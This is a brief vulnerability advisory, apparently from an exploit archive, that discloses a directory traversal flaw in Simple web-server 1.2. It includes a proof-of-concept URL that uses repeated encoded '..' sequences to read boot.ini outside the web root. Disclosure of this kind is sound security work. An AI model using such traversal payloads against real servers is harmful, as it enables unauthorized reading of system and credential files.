------------------------------------------------------------------------Software................Simple web-server 1.2Vulnerability...........Directory TraversalThreat Level............Serious (3/5)Download................http://www.storecalc.comDiscovery Date..........6/1/2011Tested On...............Windows XP SP3 EN------------------------------------------------------------------------Author..................AutoSec ToolsSite....................http://www.autosectools.com/Email...................John Leitch <john@autosectools.com>--------------------------------------------------------------------------Description--A directory traversal vulnerability in Simple web-server 1.2 can beexploited to read files outside of the web root.--PoC--http://localhost/%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../boot.ini